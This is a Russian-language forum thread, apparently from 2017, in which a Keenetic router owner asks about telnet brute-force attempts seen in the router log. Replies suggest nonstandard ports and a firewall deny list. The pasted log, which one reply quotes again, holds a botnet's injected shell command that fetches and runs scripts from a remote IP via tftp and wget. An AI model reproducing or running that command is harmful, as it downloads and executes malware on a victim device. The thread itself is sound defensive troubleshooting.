Нежданные гости. Как быть, что делать?

[xxxsadistxxx]

Keenetic II (2.10.A.5.0-7)

На свою голову, заглянул в журнал. А там!...мама роди меня обратно. Что и как, сам не осиливаю понять. Помогите, кто в курсе, а то сталкивался с таким.

В общем, что-то/кто-то, безудержно "любит" мой роутер. То и дело, роутер банит различные ip, которые домогаются 23-й порт (telnet), круглосуточно. Как давно, трудно сказать. Думал прошивка новая, потом одумался грешить на неё. На 2.09 видел тоже самое. Да и с год назад, на 2.06, но тогда или не придал значения, да и проблема исчезала, какое-то время, любовался чистым журналом.

А сейчас зацепился, спать не могу, зная, что кто-то "теребонькает" мой роутер.

Порты открыты/закрыты. Все одно. Когда убрал из правил (закрыл), доступ к этому порту, на время пропали строчки с попыткой залогиниться "admin", "shell", "sh"...а потом все равно полезли.

[xxxsadistxxx]

Aug  9 01:33:31 ndm: Core::Server: client disconnected.
[E] Aug  9 01:33:32 ndm: Core::Authenticator: no such user: "shell".
Aug  9 01:34:05 telnetd: a new connection from ::ffff:85.105.135.145 accepted.
Aug  9 01:34:05 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:34:05 ndm: Core::Authenticator: generating.
[E] Aug  9 01:34:08 ndm: Core::Authenticator: access to "cli" denied for user "root".
[E] Aug  9 01:34:10 ndm: Core::Authenticator: no such user: "enable".
Aug  9 01:34:12 ndm: Netfilter::Util::BfdManager: ban remote host 85.105.135.145 for 15 minutes.
[E] Aug  9 01:34:13 ndm: Core::Authenticator: no such user: "shell".
Aug  9 01:35:28 telnetd: a new connection from ::ffff:223.246.176.248 accepted.
Aug  9 01:35:28 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:35:28 ndm: Core::Authenticator: generating.
Aug  9 01:35:31 ndm: Core::Authenticator: generating.
[E] Aug  9 01:35:31 ndm: Core::Authenticator: user "admin": invalid password.
[E] Aug  9 01:35:34 ndm: Core::Authenticator: no such user: "enable".
[E] Aug  9 01:35:37 ndm: Core::Authenticator: no such user: "shell".
Aug  9 01:36:11 telnetd: ::ffff:223.246.176.248 client disconnected.
Aug  9 01:36:11 ndm: Core::Server: client disconnected.
Aug  9 01:36:11 telnetd: a new connection from ::ffff:223.246.176.248 accepted.
Aug  9 01:36:11 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:36:11 ndm: Core::Authenticator: generating.
[E] Aug  9 01:36:14 ndm: Core::Authenticator: access to "cli" denied for user "root".
[E] Aug  9 01:36:16 ndm: Core::Authenticator: no such user: "enable".
Aug  9 01:36:18 ndm: Netfilter::Util::BfdManager: ban remote host 223.246.176.248 for 15 minutes.
[E] Aug  9 01:36:20 ndm: Core::Authenticator: no such user: "shell".
Aug  9 01:36:54 telnetd: ::ffff:223.246.176.248 client disconnected.
Aug  9 01:36:54 ndm: Core::Server: client disconnected.
Aug  9 01:37:20 telnetd: a new connection from ::ffff:78.186.251.220 accepted.
Aug  9 01:37:20 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:37:20 ndm: Core::Authenticator: generating.
Aug  9 01:37:23 ndm: Core::Authenticator: generating.
[E] Aug  9 01:37:23 ndm: Core::Authenticator: user "admin": invalid password.
Aug  9 01:37:53 telnetd: ::ffff:78.186.251.220 client disconnected.
Aug  9 01:37:53 ndm: Core::Server: client disconnected.
Aug  9 01:40:33 telnetd: a new connection from ::ffff:120.55.190.59 accepted.
Aug  9 01:40:33 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:40:33 ndm: Core::Authenticator: generating.
[E] Aug  9 01:41:04 ndm: Core::Authenticator: access to "cli" denied for user "root".
[E] Aug  9 01:41:15 ndm: Core::Authenticator: no such user: "sh".
[E] Aug  9 01:41:22 ndm: Core::Authenticator: no such user: "cd /tmp || cd /mnt || cd /var; tftp -r tftp.sh -g 89.248.162.146; sh tftp.sh; wget http://89.248.162.146/bin.sh; sh bin.sh; busybox wget http://89.248.162.146/bin1.sh; sh bin1.sh".
[E] Aug  9 01:41:35 ndm: Core::Syslog: last message repeated 2 times.
Aug  9 01:41:37 ndm: Netfilter::Util::BfdManager: ban remote host 120.55.190.59 for 15 minutes.
Aug  9 01:41:37 ndm: Core::Server: client disconnected.
Aug  9 01:41:37 telnetd: ::ffff:120.55.190.59 client disconnected.
Aug  9 01:42:28 telnetd: a new connection from ::ffff:178.239.212.223 accepted.
Aug  9 01:42:28 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:42:28 ndm: Core::Authenticator: generating.
Aug  9 01:42:31 ndm: Core::Authenticator: generating.
[E] Aug  9 01:42:31 ndm: Core::Authenticator: user "admin": invalid password.
[E] Aug  9 01:42:34 ndm: Core::Authenticator: no such user: "enable".
[E] Aug  9 01:42:36 ndm: Core::Authenticator: no such user: "shell".
Aug  9 01:43:10 telnetd: ::ffff:178.239.212.223 client disconnected.
Aug  9 01:43:10 ndm: Core::Server: client disconnected.
Aug  9 01:43:10 telnetd: a new connection from ::ffff:178.239.212.223 accepted.
Aug  9 01:43:10 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:43:10 ndm: Core::Authenticator: generating.
[E] Aug  9 01:43:12 ndm: Core::Authenticator: access to "cli" denied for user "root".
[E] Aug  9 01:43:15 ndm: Core::Authenticator: no such user: "enable".
Aug  9 01:43:17 ndm: Netfilter::Util::BfdManager: ban remote host 178.239.212.223 for 15 minutes.
[E] Aug  9 01:43:18 ndm: Core::Authenticator: no such user: "shell".
Aug  9 01:43:51 telnetd: ::ffff:178.239.212.223 client disconnected.
Aug  9 01:43:51 ndm: Core::Server: client disconnected.

Edited August 9, 2017 by xxxsadistxxx
Попытка убрать под спойлер

[KorDen]

46 минут назад, xxxsadistxxx сказал:

Когда убрал из правил (закрыл), доступ к этому порту, на время пропали строчки с попыткой залогиниться "admin", "shell", "sh"...а потом все равно полезли.

Если порт закрыт - откуда строчкам взяться?

Если уж так надо светить морду наружу, ставьте нестандртные порты, условно из 10000+ - ботов, которые долбятся по дефолтным портам, не счесть

[vasek00]

 

Edited August 9, 2017 by vasek00

[vasek00]

Мне вот интересно какое отношение ко всему этому имеет

[E] Aug  9 01:41:22 ndm: Core::Authenticator: no such user: "cd /tmp || cd /mnt || cd /var; tftp -r tftp.sh -g 89.248.162.146; sh tftp.sh; wget http://89.248.162.146/bin.sh; sh bin.sh; busybox wget http://89.248.162.146/bin1.sh; sh bin1.sh".

скачать tftp.sh запустить его и далее два bin (это html страница для вывода на экрна информации про Wowza Media Server)

 

[MDP]

Я поступил  топорно)))) ...правда у меня открыт 21 порт. Процентов на 90 снизилась краснота в логах. )))))) 

Тупо сделал фильтр в МСЭ  на входящем интерфейсе. ...ну как вариант сойдёт.))) В фильтре в большей массе Китай и Индия.

 

Скрытый текст

access-list _WEBADMIN_PPPoE0
    deny icmp 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0
    deny ip 2.134.128.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 14.32.0.0 255.224.0.0 0.0.0.0 0.0.0.0
    deny ip 37.151.136.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 39.32.0.0 255.224.0.0 0.0.0.0 0.0.0.0
    deny ip 43.248.68.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 43.250.156.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 43.250.164.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 45.55.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 45.64.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 45.65.0.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 45.112.0.0 255.240.0.0 0.0.0.0 0.0.0.0
    deny ip 46.219.16.0 255.255.248.0 0.0.0.0 0.0.0.0
    deny ip 47.8.0.0 255.254.0.0 0.0.0.0 0.0.0.0
    deny ip 47.11.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 49.33.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 49.34.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 49.35.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 49.146.0.0 255.255.224.0 0.0.0.0 0.0.0.0
    deny ip 59.95.192.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 59.96.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 59.97.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 60.191.32.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 60.218.0.0 255.254.0.0 0.0.0.0 0.0.0.0
    deny ip 61.2.240.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 71.6.146.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 80.82.77.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 85.97.205.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 87.253.32.0 255.255.224.0 0.0.0.0 0.0.0.0
    deny ip 91.140.188.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 94.23.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 94.102.49.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 95.142.88.0 255.255.248.0 0.0.0.0 0.0.0.0
    deny ip 103.57.140.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 103.66.232.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 103.208.116.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 103.216.144.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 104.152.52.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 104.171.118.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 106.75.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 114.112.104.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 117.192.0.0 255.240.0.0 0.0.0.0 0.0.0.0
    deny ip 117.208.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 117.212.0.0 255.252.0.0 0.0.0.0 0.0.0.0
    deny ip 117.241.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 118.193.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 120.132.0.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 122.53.98.224 255.255.255.224 0.0.0.0 0.0.0.0
    deny ip 122.154.224.0 255.255.224.0 0.0.0.0 0.0.0.0
    deny ip 122.173.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 122.224.153.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 125.18.128.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 137.59.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 139.162.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 157.48.0.0 255.252.0.0 0.0.0.0 0.0.0.0
    deny ip 163.0.0.0 255.0.0.0 0.0.0.0 0.0.0.0
    deny ip 164.52.0.0 255.255.128.0 0.0.0.0 0.0.0.0
    deny ip 168.1.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 172.104.0.0 255.254.0.0 0.0.0.0 0.0.0.0
    deny ip 175.100.128.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 178.89.8.0 255.255.248.0 0.0.0.0 0.0.0.0
    deny ip 182.64.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 182.176.0.0 255.240.0.0 0.0.0.0 0.0.0.0
    deny ip 183.87.32.0 255.255.224.0 0.0.0.0 0.0.0.0
    deny ip 183.128.0.0 255.240.0.0 0.0.0.0 0.0.0.0
    deny ip 183.204.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 196.52.0.0 255.252.0.0 0.0.0.0 0.0.0.0
    deny ip 198.20.64.0 255.255.192.0 0.0.0.0 0.0.0.0
    deny ip 202.62.64.0 255.255.224.0 0.0.0.0 0.0.0.0
    deny ip 203.100.64.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 202.131.114.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 203.134.198.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 204.93.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 209.126.136.0 255.255.255.224 0.0.0.0 0.0.0.0
    deny ip 211.138.0.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 212.97.0.0 255.255.224.0 0.0.0.0 0.0.0.0
    deny ip 220.225.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    permit tcp 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0 port eq 21

 

Edited August 9, 2017 by MDP

[xxxsadistxxx]

6 часов назад, KorDen сказал:

Если порт закрыт - откуда строчкам взяться?

Вот я сам не пойму. Когда закрыл порт, на время пропали строки с логином и были только строки об отказе доступа (думаю логична фиксация этого, ведь я закрыл порт, но бот не перестал же стучаться). А через время снова обнаружил попытки залогиниться и тут стало страшно 

3 часа назад, vasek00 сказал:

скачать tftp.sh запустить его и далее два bin (это html страница для вывода на экрна информации про Wowza Media Server)

А можно подробнее, что это вообще такое (я не знаток). Это попытка пробиться в роутер через тот же telnet, но более серьёзная? Вроде как пытались смонтировать директории мозга и скопировать туда скрипт неизвестной байды? Высшая наглость))

Скачать скачаю, не уверен что запущу/сделаю с ним, то что надо. Если есть возможность помочь, могу создать учетку и дать доступ прямой или могу установить тимвивер (мало вероятно что запомню все увиденное, но интересно )

Две показанные темы прочитал, немного успокоился, в том плане что далеко не одинок, но сам факт таких ботов и в таком кол-ве удручает (это даже открытие для меня, я конечно не ребёнок и знаю о таких вещах, но о масштабах не подозревал). И сделать ничего нельзя, на уровне провайдеров, иначе вся планета в бане будет париться. Вот она обратная сторона, всех этих анонимайзеров и сетей по типу ТОРа. Кому-то во благо, а кому-то чужие роутеры "теребонькать".

59 минут назад, MDP сказал:

Тупо сделал фильтр в МСЭ

Видимо да, придётся как все, юзать другие порты и наполнять ручками, свой бан лист, периодически вылавливая IP из журнала.

[MDP]

6 минут назад, xxxsadistxxx сказал:

 

Видимо да, придётся как все, юзать другие порты и наполнять ручками, свой бан лист, периодически вылавливая IP из журнала.

Если китайские и индийские товарищи не нужны...то можете смело брать кусок этого фЫльтра и приляпать себе)))) 

А так конечно непродуманно как-то происходила выдача IPv4 для разных стран мира...диапазоны все вперемешку.